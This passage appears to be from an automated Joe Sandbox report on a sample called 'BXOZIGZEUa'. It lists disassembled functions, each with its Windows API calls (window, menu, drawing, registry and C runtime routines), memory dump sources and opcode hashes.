                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: RectWindow$Offset
                                                              • String ID:
                                                              • API String ID: 1579746580-0
                                                              • Opcode ID: 89af1b5594a1de260b3f7f37c89245512684b3ca07939d7e2c55d1fdc519b3f3
                                                              • Instruction ID: 319bc68aa51f14c9bb549f76303296bfd6536dfbe789624163c656a636cf4356
                                                              • Opcode Fuzzy Hash: 89af1b5594a1de260b3f7f37c89245512684b3ca07939d7e2c55d1fdc519b3f3
                                                              • Instruction Fuzzy Hash: 3E51E971A00219AFCF01DFA4C988DEEBBB9FF48304F10406AF905F7251DA35AA04DB61
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00558886
                                                              • GetCursorPos.USER32(00000000), ref: 005588A6
                                                              • ScreenToClient.USER32(00000000,00000000), ref: 005588B3
                                                              • PtInRect.USER32(?,00000000,00000000), ref: 005588C6
                                                              • SendMessageW.USER32(?,00000000,00646E1C), ref: 005588FC
                                                              • SendMessageW.USER32(00000000,00000000,00646E1C), ref: 00558915
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientCursorParentRectScreen
                                                              • String ID:
                                                              • API String ID: 4164469669-0
                                                              • Opcode ID: 924edf150a45e1eae522a212a1fa2833ac76d739d357cd952234c60a186840da
                                                              • Instruction ID: 9ff11ba41ccbbd27d1fd2351ab57e9c3282a70c8b3f6c8664af43880e02e49c6
                                                              • Opcode Fuzzy Hash: 924edf150a45e1eae522a212a1fa2833ac76d739d357cd952234c60a186840da
                                                              • Instruction Fuzzy Hash: C841B075A00205ABCB10AFA6D854BBA7FFAFB49305F14446EF805E7260DF759808DB25
                                                              APIs
                                                              • IsMenu.USER32(?), ref: 005403C8
                                                              • GetMenuDefaultItem.USER32(?,00000000,00000001), ref: 005403EE
                                                              • GetMenuItemCount.USER32(?), ref: 005403FA
                                                              • GetMenuItemID.USER32(?,?), ref: 00540423
                                                              • GetSubMenu.USER32(?,?), ref: 0054046E
                                                              • GetMenuState.USER32(?,?,00000400), ref: 005404A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountDefaultState
                                                              • String ID:
                                                              • API String ID: 170603052-0
                                                              • Opcode ID: 84b1ac8f4de1d00b2367a9130c075de75076b88e53ac48ba5aea7a652e39fccb
                                                              • Instruction ID: 1d692375bfa7c9735019cfe5808b93150c0e360c26be76030b7527a087fb4198
                                                              • Opcode Fuzzy Hash: 84b1ac8f4de1d00b2367a9130c075de75076b88e53ac48ba5aea7a652e39fccb
                                                              • Instruction Fuzzy Hash: EB417175600205AFCF11AF61C889AADBFB5FF48714F209529FA06DB2A1CB34ED41DB90
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0052CEB9
                                                              • GetTopWindow.USER32(?), ref: 0052CF24
                                                              • GetWindow.USER32(?,00000002), ref: 0052CF42
                                                              • IsWindow.USER32(?), ref: 0052CF61
                                                              • GetParent.USER32(?), ref: 0052CF6C
                                                              • DestroyWindow.USER32(?), ref: 0052CF78
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$H_prolog3$DestroyException@8ParentThrow
                                                              • String ID:
                                                              • API String ID: 3096848108-0
                                                              • Opcode ID: bbcf278de2aa6a370839bf3de3accc279ae9bbbd5e52aecbfcabc3fcb8f1d0db
                                                              • Instruction ID: 1a082c9134816687172089d10bcaa4c639c67a86e469bccd2bd4ef3a3ef207a8
                                                              • Opcode Fuzzy Hash: bbcf278de2aa6a370839bf3de3accc279ae9bbbd5e52aecbfcabc3fcb8f1d0db
                                                              • Instruction Fuzzy Hash: D741EF31900624DFCF22EFA4D9896ADBFB2BF99300F254589E845BB292DB345D40DB91
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0051CD09
                                                              • OffsetRect.USER32(?,?,?), ref: 0051CD27
                                                              • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 0051CD34
                                                              • IsWindowVisible.USER32(?), ref: 0051CD3D
                                                              • SendMessageW.USER32(00000014,0000000B,00000001,00000000), ref: 0051CDB0
                                                              • RedrawWindow.USER32(00000105,00000000,00000000,00000105), ref: 0051CDC0
                                                                • Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageRectSend$OffsetRedrawVisible
                                                              • String ID:
                                                              • API String ID: 2707749077-0
                                                              • Opcode ID: 48781029bfed2a224b8ceed2acc585d9b9960b60e9aa7d77e6aebb410d5785af
                                                              • Instruction ID: 65c6569259997f4562c8e82ac8a3e9f784c0388e02931b04735fd928e956731c
                                                              • Opcode Fuzzy Hash: 48781029bfed2a224b8ceed2acc585d9b9960b60e9aa7d77e6aebb410d5785af
                                                              • Instruction Fuzzy Hash: E631ECB2A00249AFDB11DFA5CD85EBFBFB9FB48704F10052DB556E6190DA75AD00DB20
                                                              APIs
                                                              • PatBlt.GDI32(00000000,00000000,005080B7,000000C6,00FF0062,00000000), ref: 00542D32
                                                              • SetBkColor.GDI32(00F0F0F0), ref: 00542D55
                                                              • BitBlt.GDI32(00000000,00000000,005080B9,000000C8,00000000,00000000,00CC0020), ref: 00542D83
                                                              • SetBkColor.GDI32 ref: 00542D96
                                                              • BitBlt.GDI32(00000000,00000000,005080B9,000000C8,00000000,00000000,00EE0086), ref: 00542DBE
                                                              • BitBlt.GDI32(00000000,00000001,00000001,005080BA,000000C9,00000000,00000000,00000000,008800C6), ref: 00542DE1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Color
                                                              • String ID:
                                                              • API String ID: 2811717613-0
                                                              • Opcode ID: c5f419428ebb458eac0d9263d2ec5afdeda9d7881ae922c0718550a979a4410c
                                                              • Instruction ID: a10f6432a6b789ba245c6cdd3ba4d2d1496d9a57b97e0e7384f60772af5e2487
                                                              • Opcode Fuzzy Hash: c5f419428ebb458eac0d9263d2ec5afdeda9d7881ae922c0718550a979a4410c
                                                              • Instruction Fuzzy Hash: F7217CB6600708BFEB249F94ED85D777BAEFB4A3587000629F245C6270C6B1AC21DB20
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00532C66
                                                                • Part of subcall function 004E0431: __EH_prolog3.LIBCMT ref: 004E0438
                                                                • Part of subcall function 004E0431: GetWindowDC.USER32(00000000,00000004,004DE19D,00000000,?,?,00605254), ref: 004E0464
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00532C88
                                                              • GetSystemMetrics.USER32(00000036), ref: 00532C9F
                                                              • GetSystemMetrics.USER32(00000036), ref: 00532CA6
                                                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00532CBF
                                                                • Part of subcall function 004E066D: SelectObject.GDI32(?,?), ref: 004E0678
                                                              • DrawFrameControl.USER32(?,?,00000001,00002000), ref: 00532CF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CompatibleCreateMetricsSystem$BitmapControlDrawFrameH_prolog3H_prolog3_ObjectSelectWindow
                                                              • String ID:
                                                              • API String ID: 3758044866-0
                                                              • Opcode ID: 6820bdb6dcb21dadfd2e967c1a5c8bdd3e2a43c8ca66c80e041a3ddae1a239b2
                                                              • Instruction ID: ba717043879c8cdaa0899003fa0f8f761be09f19a72fc362a9f2f5214eb16642
                                                              • Opcode Fuzzy Hash: 6820bdb6dcb21dadfd2e967c1a5c8bdd3e2a43c8ca66c80e041a3ddae1a239b2
                                                              • Instruction Fuzzy Hash: C4310170D00258AFCB05EFE6C985AEDBFB4BF18304F54806AE511B7291DBB85A48DF64
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004E4CE1
                                                              • GetParent.USER32(?), ref: 004E4CEF
                                                              • GetParent.USER32(?), ref: 004E4D02
                                                              • GetLastActivePopup.USER32(?), ref: 004E4D13
                                                              • IsWindowEnabled.USER32(?), ref: 004E4D27
                                                              • EnableWindow.USER32(?,00000000), ref: 004E4D3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                              • String ID:
                                                              • API String ID: 670545878-0
                                                              • Opcode ID: c651437796e8c9953fe2918ea52fa2e85ac1260eac8acddf423f43cbcb326802
                                                              • Instruction ID: fce3da4a28211f788259e10a7eb1917e59ae6cfb8a2eb050c548919cbf55119f
                                                              • Opcode Fuzzy Hash: c651437796e8c9953fe2918ea52fa2e85ac1260eac8acddf423f43cbcb326802
                                                              • Instruction Fuzzy Hash: 3D1194325026B157DB311A5B9C44B3B63989FD4BA3F274157ED01E7304DB2DDC0192A9
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 005166D3
                                                              • GetWindow.USER32(00000000), ref: 005166DA
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00516716
                                                              • ShowWindow.USER32(00000000,00000000,?,?,?,?,00517F19,00000001), ref: 00516731
                                                              • ShowWindow.USER32(00000000,00000004,?,?,?,?,?,?,?,?,?,?,?,00517F19,00000001), ref: 00516755
                                                              • GetWindow.USER32(00000000,00000002), ref: 0051675E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$DesktopLong
                                                              • String ID:
                                                              • API String ID: 3178490500-0
                                                              • Opcode ID: a788d3c6c13bfccc81a647d5b73487efa0e9d0d2be466ce09efbdd7c42eec2f4
                                                              • Instruction ID: 739ce501a9b43f10e10d47abe080016e88d94dc62367261dea9ae2bd676c4667
                                                              • Opcode Fuzzy Hash: a788d3c6c13bfccc81a647d5b73487efa0e9d0d2be466ce09efbdd7c42eec2f4
                                                              • Instruction Fuzzy Hash: 8311CE31501744ABEB219B298C99FBB7EA9FBA1B68F240598F501D22D0DF78CC80DA50
                                                              APIs
                                                              • GetMenuItemCount.USER32(?), ref: 00555765
                                                              • GetMenuState.USER32(?,00000000,00000400), ref: 00555782
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00555791
                                                              • CheckMenuItem.USER32(?,00000000,00000008), ref: 005557A5
                                                              • EnableMenuItem.USER32(?,00000000,00000002), ref: 005557B7
                                                              • EnableMenuItem.USER32(?,00000000,00000001), ref: 005557C9
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$Enable$CheckCountException@8H_prolog3StateThrow
                                                              • String ID:
                                                              • API String ID: 4237646742-0
                                                              • Opcode ID: 39841df786085760f6232cb86050113c39036951884aa80efab356895b068f38
                                                              • Instruction ID: 2bc90528bf105d38aba9a777714b24ca9a029a5b30363b4eb7080ea59aea1ca2
                                                              • Opcode Fuzzy Hash: 39841df786085760f6232cb86050113c39036951884aa80efab356895b068f38
                                                              • Instruction Fuzzy Hash: 0F210230900609FBDB116B65CC6AB6DBFB9FF40345F20805AF811A2161DB769D04DB40
                                                              APIs
                                                              • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 004E43D9
                                                              • RegDeleteValueW.ADVAPI32(00000000,?), ref: 004E43F8
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004E4425
                                                                • Part of subcall function 004E41A4: RegCloseKey.ADVAPI32(?), ref: 004E4249
                                                                • Part of subcall function 004E41A4: RegCloseKey.ADVAPI32(?), ref: 004E4253
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004E4440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Close$Delete$PrivateProfileStringValueWrite
                                                              • String ID:
                                                              • API String ID: 1330817964-0
                                                              • Opcode ID: 07e9a4426612d23f7c9f5ac29237f1582390e1c2eb0d6ce680fe425ff2774a3d
                                                              • Instruction ID: 5a6fd8dc3ddae70e1c385fbf3f410bf5e717a841a996e06d604bbb378eba1568
                                                              • Opcode Fuzzy Hash: 07e9a4426612d23f7c9f5ac29237f1582390e1c2eb0d6ce680fe425ff2774a3d
                                                              • Instruction Fuzzy Hash: 3311E733500195FFCF212FA2DC88CBF3B6AFF983567018426FA1586021CB398912EB59
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 004E0FD8
                                                              • GetDlgCtrlID.USER32(00000000), ref: 004E0FE9
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004E0FF9
                                                              • GetWindowRect.USER32(00000000,00000000), ref: 004E101B
                                                              • PtInRect.USER32(00000000,00000000,00000000), ref: 004E102B
                                                              • GetWindow.USER32(?,00000005), ref: 004E1038
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                              • String ID:
                                                              • API String ID: 1315500227-0
                                                              • Opcode ID: 18d6894ee0c68081b233dcf82ac7eb75409c4d081fe3eebf09c5d4ecaa7e1e68
                                                              • Instruction ID: a5e9f1b4f6ba274a5610674ac1863bfeebb5ebbaa2c703c0e451c98abbdaf7f4
                                                              • Opcode Fuzzy Hash: 18d6894ee0c68081b233dcf82ac7eb75409c4d081fe3eebf09c5d4ecaa7e1e68
                                                              • Instruction Fuzzy Hash: F7119E72941159ABDB11AF55CC08BBE77B8EF25362F204015F501E21A0CB789A45DB96
                                                              APIs
                                                              • GetFocus.USER32 ref: 004E111C
                                                              • GetParent.USER32(00000000), ref: 004E1144
                                                                • Part of subcall function 004E0F09: GetWindowLongW.USER32(?,000000F0), ref: 004E0F2A
                                                                • Part of subcall function 004E0F09: GetClassNameW.USER32(?,?,0000000A), ref: 004E0F3F
                                                                • Part of subcall function 004E0F09: CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 004E0F59
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004E115F
                                                              • GetParent.USER32(?), ref: 004E116D
                                                              • GetDesktopWindow.USER32 ref: 004E1171
                                                              • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 004E1185
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
                                                              • String ID:
                                                              • API String ID: 1233893325-0
                                                              • Opcode ID: 8dc177a75fdab5c1a88aee032631d51a7bc28e1e789aa7c2338ad493661d3041
                                                              • Instruction ID: 21f37001f821796cb61e71ac9a5ccb8a9a173045a5bb671bceef8a067c505297
                                                              • Opcode Fuzzy Hash: 8dc177a75fdab5c1a88aee032631d51a7bc28e1e789aa7c2338ad493661d3041
                                                              • Instruction Fuzzy Hash: 4901A73228039136DB2127375C84B3B656CAB99752F144526F700E33A0DF7DDC01915C
                                                              APIs
                                                              • __getptd.LIBCMT ref: 005D53E6
                                                                • Part of subcall function 005D5DC1: __getptd_noexit.LIBCMT ref: 005D5DC4
                                                                • Part of subcall function 005D5DC1: __amsg_exit.LIBCMT ref: 005D5DD1
                                                              • __amsg_exit.LIBCMT ref: 005D5406
                                                              • __lock.LIBCMT ref: 005D5416
                                                              • InterlockedDecrement.KERNEL32(?), ref: 005D5433
                                                              • _free.LIBCMT ref: 005D5446
                                                              • InterlockedIncrement.KERNEL32(00B72D00), ref: 005D545E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 3470314060-0
                                                              • Opcode ID: d793ba950fb22d410af275c4cc97769c32dde47862a63e26edff83fccff65886
